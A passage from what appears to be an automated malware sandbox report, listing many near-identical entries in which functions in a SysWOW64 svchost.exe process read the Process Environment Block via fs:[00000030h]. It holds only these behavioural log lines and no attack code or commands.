            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C mov eax, dword ptr fs:[00000030h]2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C mov eax, dword ptr fs:[00000030h]2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB92BC mov eax, dword ptr fs:[00000030h]2_2_03BB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB92BC mov eax, dword ptr fs:[00000030h]2_2_03BB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB92BC mov ecx, dword ptr fs:[00000030h]2_2_03BB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB92BC mov ecx, dword ptr fs:[00000030h]2_2_03BB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A0 mov eax, dword ptr fs:[00000030h]2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A0 mov eax, dword ptr fs:[00000030h]2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A0 mov eax, dword ptr fs:[00000030h]2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A0 mov eax, dword ptr fs:[00000030h]2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF92A6 mov eax, dword ptr fs:[00000030h]2_2_03BF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF92A6 mov eax, dword ptr fs:[00000030h]2_2_03BF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF92A6 mov eax, dword ptr fs:[00000030h]2_2_03BF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF92A6 mov eax, dword ptr fs:[00000030h]2_2_03BF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC72A0 mov eax, dword ptr fs:[00000030h]2_2_03BC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC72A0 mov eax, dword ptr fs:[00000030h]2_2_03BC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C052E2 mov eax, dword ptr fs:[00000030h]2_2_03C052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6329E mov eax, dword ptr fs:[00000030h]2_2_03B6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6329E mov eax, dword ptr fs:[00000030h]2_2_03B6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05283 mov eax, dword ptr fs:[00000030h]2_2_03C05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03BEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B292FF mov eax, dword ptr fs:[00000030h]2_2_03B292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED mov eax, dword ptr fs:[00000030h]2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03B2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03B2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03B2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03B5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03B5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B392C5 mov eax, dword ptr fs:[00000030h]2_2_03B392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B392C5 mov eax, dword ptr fs:[00000030h]2_2_03B392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B67208 mov eax, dword ptr fs:[00000030h]2_2_03B67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B67208 mov eax, dword ptr fs:[00000030h]2_2_03B67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B59274 mov eax, dword ptr fs:[00000030h]2_2_03B59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B71270 mov eax, dword ptr fs:[00000030h]2_2_03B71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B71270 mov eax, dword ptr fs:[00000030h]2_2_03B71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFD26B mov eax, dword ptr fs:[00000030h]2_2_03BFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFD26B mov eax, dword ptr fs:[00000030h]2_2_03BFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05227 mov eax, dword ptr fs:[00000030h]2_2_03C05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEB256 mov eax, dword ptr fs:[00000030h]2_2_03BEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEB256 mov eax, dword ptr fs:[00000030h]2_2_03BEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29240 mov eax, dword ptr fs:[00000030h]2_2_03B29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29240 mov eax, dword ptr fs:[00000030h]2_2_03B29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6724D mov eax, dword ptr fs:[00000030h]2_2_03B6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C051CB mov eax, dword ptr fs:[00000030h]2_2_03C051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE11A4 mov eax, dword ptr fs:[00000030h]2_2_03BE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE11A4 mov eax, dword ptr fs:[00000030h]2_2_03BE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE11A4 mov eax, dword ptr fs:[00000030h]2_2_03BE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE11A4 mov eax, dword ptr fs:[00000030h]2_2_03BE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B87190 mov eax, dword ptr fs:[00000030h]2_2_03B87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B351ED mov eax, dword ptr fs:[00000030h]2_2_03B351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03B6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03B6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B31131 mov eax, dword ptr fs:[00000030h]2_2_03B31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B31131 mov eax, dword ptr fs:[00000030h]2_2_03B31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05152 mov eax, dword ptr fs:[00000030h]2_2_03C05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC9179 mov eax, dword ptr fs:[00000030h]2_2_03BC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37152 mov eax, dword ptr fs:[00000030h]2_2_03B37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C050D9 mov eax, dword ptr fs:[00000030h]2_2_03C050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35096 mov eax, dword ptr fs:[00000030h]2_2_03B35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D090 mov eax, dword ptr fs:[00000030h]2_2_03B5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D090 mov eax, dword ptr fs:[00000030h]2_2_03B5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6909C mov eax, dword ptr fs:[00000030h]2_2_03B6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D08D mov eax, dword ptr fs:[00000030h]2_2_03B2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B550E4 mov eax, dword ptr fs:[00000030h]2_2_03B550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B550E4 mov ecx, dword ptr fs:[00000030h]2_2_03B550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B590DB mov eax, dword ptr fs:[00000030h]2_2_03B590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
